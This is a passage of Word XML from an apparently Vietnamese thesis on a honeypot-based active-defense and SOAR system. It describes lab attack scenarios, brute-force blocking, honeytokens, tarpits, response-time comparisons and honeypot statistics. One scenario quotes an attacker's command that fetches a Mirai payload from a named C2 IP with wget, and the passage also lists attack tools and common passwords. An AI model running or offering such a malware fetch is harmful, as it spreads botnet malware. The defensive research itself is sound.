        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="5A93072B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A95756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lastRenderedPageBreak/>
              <w:t>core/soar_enforcer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02C6A7F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Thực thi chặn iptables/nftables, điều hướng Tarpit và quản lý Whitelist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A26B8F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subprocess, platform, iptables, nat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="6B209FFA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5586DDE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core/telegram_soar_bot.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31FAD1B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Gửi thẻ cảnh báo và xử lý tương tác nút bấm 2 chiều từ điện thoại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E4D00B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Telegram Bot API, inline_keyboard, threading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="13D0C892" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DA628A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main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A71E7E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Khởi tạo, nạp cấu hình YAML và điều phối luồng xử lý toàn hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EDB72D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pyyaml, sys, logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAB3A31"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02E449A3"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0AE9B1E8"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5: THỬ NGHIỆM THỰC TẾ, ĐÁNH GIÁ VÀ PHÂN TÍCH TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425AD3E5"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5.1 Thiết lập Môi trường Thử nghiệm Thực tế (Lab Setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317FD50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kiểm chứng toàn diện năng lực của Hệ thống Active Defense &amp; SOAR, môi trường thực nghiệm được thiết lập theo mô hình diễn tập Red Team vs. Blue Team trên hạ tầng mạng ảo hóa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BED6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Máy chủ Blue Team (Phòng thủ &amp; Mini-SOC): Cấu hình Ubuntu Server 22.04 LTS, 4 vCPU, 8GB RAM, chạy Cowrie Honeypot (chuyển hướng cổng 22 sang 2222), dịch vụ Tarpit Endlessh tại cổng 22222 và toàn bộ hệ thống Python Orchestrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F079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Máy trạm Red Team (Kẻ tấn công): Máy ảo Kali Linux 2024.1 trang bị các công cụ tấn công dò quét hàng đầu (Hydra, Medusa, Nmap, Metasploit Framework, Paramiko Brute-force Script).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30832C2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Bộ công cụ Giả lập Tự động ('scripts/simulate_attack.py'): Được phát triển để tái hiện chính xác các chuỗi sự kiện tấn công phức tạp nhằm đo đạc thời gian đáp ứng chuẩn xác ở cấp độ mili-giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340ECF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5.2 Kịch bản 1: Mô phỏng Tấn công Dò quét SSH Brute-force &amp; Hiệu quả Chặn tức thời</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0A18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kịch bản này, máy Red Team (IP: 185.220.101.5) sử dụng công cụ Hydra phát động cuộc tấn công từ điển nhắm vào tài khoản root với danh sách 100 mật khẩu phổ biến nhất. Tốc độ thử nghiệm là 10 request/giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2201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Diễn biến xử lý của Hệ thống SOAR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A26274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Tại 4 lần thử đầu tiên, Cowrie ghi nhận sự kiện 'cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>login.failed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>', Correlation Engine cập nhật bộ đếm vào danh sách trượt thời gian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF05C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Tại lần thử thứ 5 (đạt ngưỡng threshold = 5 trong 60 giây), Correlation Engine lập tức nâng cấp sự cố lên mức HIGH, gán nhãn kỹ thuật 'MITRE ATT&amp;CK T1110.001 - Brute Force: Password Guessing'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E45F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Playbook tự động của SOAR Enforcer được kích hoạt: chèn lệnh iptables DROP địa chỉ IP 185.220.101.5 trong thời gian 3600 giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DDF86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4. Toàn bộ tiến trình Hydra phía kẻ tấn công bị ngắt kết nối đột ngột (Connection Timed Out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469071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Đồng thời, một Thẻ cảnh báo sự cố kèm kết quả trinh sát GeoIP (Đức / Tor Exit Node) và nút bấm can thiệp được gửi tới điện thoại của Chuyên viên SOC qua Telegram trong vòng 1.2 giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E60DCA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5.3 Kịch bản 2: Hacker Xâm nhập Thành công và Kích hoạt Bẫy Honeytoken (Khử ẩn danh Real IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FECA5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kịch bản này, hacker sử dụng một máy chủ VPN tại Hà Lan (IP: 45.33.32.156) để dò trúng mật khẩu yếu 'password123' và đăng nhập thành công vào Honeypot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA632B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Ngay khi đăng nhập, sự kiện 'cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>' kích hoạt Cảnh báo Mức độ CRITICAL (MITRE T1078 - Valid Accounts). Hệ thống lập tức khởi động chế độ 'Silent Monitoring &amp; Deep Deception' thay vì chặn ngay, nhằm thu thập thêm bằng chứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF57E8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Hacker tiến hành trinh sát nội bộ bằng các lệnh 'whoami', 'uname -a' (kích hoạt cảnh báo MITRE T1082).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403391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Hacker phát hiện tệp tin mồi nhử '/root</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do HoneytokenManager gài sẵn và thực hiện lệnh 'cat' để đánh cắp (kích hoạt MITRE T1552.001).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2D8F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Khử ẩn danh: Hacker sao chép thông tin tài khoản và đường link kiểm tra trong file về trình duyệt máy tính cá nhân thật tại Việt Nam để kiểm tra xem tài khoản AWS có hoạt động không. Ngay lập tức, Canary Webhook Server ghi nhận HTTP Request từ địa chỉ IP thật của hacker (ví dụ: 14.161.x.x - Mạng Viettel Internet cáp quang), đi kèm User-Agent trình duyệt Chrome trên Windows 11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B386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Nhờ đó, lớp vỏ bọc VPN Hà Lan của hacker bị bóc trần hoàn toàn, định danh chính xác vị trí thực tế của thủ phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEEAC3D"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5.4 Kịch bản 3: Tải Payload Độc hại lên Hệ thống và Phân tích Trích xuất IOCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5299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Hacker thực thi lệnh tải mã độc từ xa: 'wget http://194.87.139.12/mirai_payload.sh'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD94D3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Cowrie tự động tải tệp tin về thư mục an toàn 'var/lib/cowrie/downloads' và phát sinh sự kiện '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cowrie.session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.file_download' (kích hoạt MITRE T1105 - Ingress Tool Transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D747A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2. Phân hệ 'PayloadAnalyzer' tự động tính toán mã băm SHA256 và bóc tách chuỗi tĩnh. Kết quả phát hiện đoạn mã có chứa địa chỉ IP máy chủ C2 '194.87.139.12' và chữ ký nhận dạng botnet 'dvrHelper' (Mirai variant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489982F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Kết quả truy vấn VirusTotal API xác nhận đây là biến thể độc hại của dòng họ mã độc '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Trojan.Linux.Mirai</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>' với tỷ lệ nhận diện 48/72 engines cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442170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Toàn bộ các chỉ số IOCs (Hash, IP C2, URL tải) được tự động xuất bản vào Threat Feed chung để cảnh báo toàn bộ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AEE9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5.5 Kịch bản 4: Kỹ thuật Giam lỏng Tarpit làm Kiệt quệ Luồng Tấn công của Botnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520F34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kiểm chứng năng lực làm tiêu hao tài nguyên đối phương, hệ thống chuyển sang chế độ phản ứng 'Tarpit Redirect' đối với IP tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21900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Thay vì ngắt kết nối bằng DROP, toàn bộ gói tin TCP tới cổng SSH từ IP của hacker được chuyển hướng sang dịch vụ Tarpit tại cổng 22222. Tại đây, máy chủ chỉ gửi từng byte banner cách nhau 10 giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F675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Kết quả đo lường: Kẻ tấn công bị giam giữ liên tục 20 luồng socket trong trạng thái ESTABLISHED suốt hơn 45 phút. Tốc độ thử mật khẩu của đối phương bị sụt giảm từ 250 lần/phút xuống còn 0 lần/phút mà tiến trình quét của hacker không hề báo lỗi, làm cạn kiệt hoàn toàn bảng socket của botnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B2AD3"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3E4AB1C6" wp14:editId="5292D8E9">
            <wp:extent cx="5486400" cy="2926080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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486400" cy="2926080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6B46C"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5.1: Đo lường Hiệu quả Làm chậm &amp; Triệt tiêu Tấn công của Cơ chế Tarpit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76346FEB"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5.6 Đánh giá Định lượng Hiệu năng: Thủ công (Manual SOC) vs Tự động hóa SOAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B67EA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chứng minh tính vượt trội về mặt kỹ thuật, một bài kiểm tra so sánh nghiêm ngặt đã được tiến hành giữa Quy trình phản ứng truyền thống của Chuyên viên SOC L1 và Nền tảng SOAR tự động hóa của đồ án:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825EFA2"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5.1: Bảng so sánh định lượng thời gian phản ứng sự cố (MTTR)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9404"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2351"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="79524872" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62671CA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Giai đoạn Xử lý Sự cố</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28C3F8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Quy trình Thủ công (SOC L1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="011C91C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Hệ sinh thái SOAR Đồ án</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="401178C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Mức độ Tối ưu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="46EFD534" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64B23BE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Phát hiện &amp; Đọc log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24B08B0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Chờ chuyên viên mở bảng điều khiển (3 - 5 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23D3107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Stream log thời gian thực (&lt; 200 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732AAB0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1.500 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="5BD3AFD2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79D3056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Tương quan &amp; Ánh xạ MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F84292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Tra cứu bảng kỹ thuật thủ công (2 - 3 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C2A744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Correlation Engine tự động (&lt; 50 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03BBEF3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3.600 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="3B54EDBF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="630CEBA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Trinh sát ngược (OSINT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01B9096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Mở trình duyệt gõ AbuseIPDB, Shodan (5 - 8 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32AACD4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Reverse Intel API tự động (1.8 giây)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D91BEE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200 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="3FF5876D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="443185B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tích Mã độc (VT Scan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AE3825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Tải file lên web VirusTotal thủ công (4 - 6 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="450C1AA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Payload Analyzer tự động băm &amp; quét (2.5 giây)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C6814D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120 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="62C0D31A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4959475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Chặn Firewall &amp; Giam Tarpit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0112161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Mở terminal gõ lệnh iptables (2 - 4 phút)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DE7440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SOAR Enforcer thực thi tự động (400 ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C28C2A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450 lần</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7F8AB52B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A6F7EC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Tổng thời gian MTTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="425E55E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15 - 26 phút (900 - 1.560 giây)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38135E8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1.8 - 2.5 giây</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A1F584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Giảm 99.8% độ trễ phản ứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07552BDC"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69804680"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669856A2" wp14:editId="7D406595">
            <wp:extent cx="5486400" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170158692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486400" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D8373"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5.2: So sánh Thời gian Phản ứng Sự cố: Quy trình Thủ công vs Tự động hóa SOAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48C2A4"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5.7 Thống kê và Phân tích Tình báo các Cuộc Tấn công Thực tế từ Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E60152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Sau khi triển khai thử nghiệm Honeypot trên một máy chủ đám mây công khai (Public Cloud IP) trong thời gian 7 ngày liên tục, hệ thống đã thu thập được 2.731 sự kiện tấn công thực tế từ khắp nơi trên thế giới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171736B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Số lượng địa chỉ IP độc hại duy nhất ghi nhận: 418 địa chỉ IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B700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Số lần tấn công dò quét brute-force: 1.420 đợt (chiếm 52% tổng số sự kiện).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626DE4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Tên đăng nhập được nhắm mục tiêu nhiều nhất: 'root' (78%), 'admin' (11%), 'user' (4%), 'ubuntu' (3%), 'test' (2%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C29C96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Mật khẩu phổ biến nhất bị hacker thử nghiệm: '123456', 'password', 'admin', 'root', '12345678', 'qwerty'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20EB3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Số lượng mã độc tải lên được bẫy ghi lại: 23 mẫu nhị phân ELF và tập lệnh bash (trong đó 19 mẫu là biến thể của Mirai botnet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED1CDB"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2A85F214" wp14:editId="6FA4A0EF">
            <wp:extent cx="5486400" cy="2926080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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5486400" cy="2926080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52790960"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5.3: Biểu đồ phân bố Kỹ thuật Tấn công ghi nhận trên Cowrie (Chuẩn MITRE ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08697F9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5.2: Top các Quốc gia và Dải mạng phát sinh lưu lượng tấn công SSH nhiều nhất</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>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79535EF0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52519EC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Hạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
